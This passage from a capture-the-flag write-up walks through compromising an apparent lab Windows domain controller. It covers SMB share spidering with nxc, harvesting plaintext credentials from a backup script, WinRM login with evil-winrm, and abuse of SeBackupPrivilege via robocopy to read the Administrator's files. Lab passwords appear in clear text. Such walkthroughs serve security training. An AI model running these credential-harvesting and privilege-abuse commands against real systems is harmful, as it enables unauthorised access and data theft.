SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Then, we may dump this share (excluding all the others) via the spider_plus module in nxc:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d cicada.htb -M spider_plus -o OUTPUT_FOLDER='nxc_spider_plus' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,SYSVOL' EXCLUDE_EXTS='ico,lnk,svg'
jamarir@kali:~$ tree nxc_spider_plus
nxc_spider_plus
├── 10.10.11.35
│ ├── DEV
│ │ └── Backup_script.ps1
│ └── HR
│ └── Notice from HR.txt
└── 10.10.11.35.json
With no surprise, the PowerShell’s script contains juicy information !
jamarir@kali:~$ cat nxc_spider_plus/10.10.11.35/DEV/Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Finally, we can access WinRM with the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M group-mem -o GROUP="Remote Management Users"
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
GROUP-MEM 10.10.11.35 389 CICADA-DC [+] Found the following members of the Remote Management Users group:
GROUP-MEM 10.10.11.35 389 CICADA-DC emily.oscars
The user flag is:
jamarir@kali:~$ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../desktop/user.txt
b0[...]8b
Administrator
emily.oscars has SeBackupPrivilege u said ?!
Back to our bloody stuffs, we see that emily.oscars is a member of the privileged domain group Backup Operators:
This user has the SeBackupPrivilege right, which allows the user to bypass ACL restrictions on the filesystem, using robocopy for example:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> robocopy /B C:/Users/Administrator/Desktop/ ./
Note that the Blackfield machine presents the same vulnerability. The attack was presented by the irreplaceable ippsec.
GG WP !
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type root.txt
88[...]63
0
Subscribe to my newsletter
Read articles from jamarir directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
jamarir
jamarir
Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO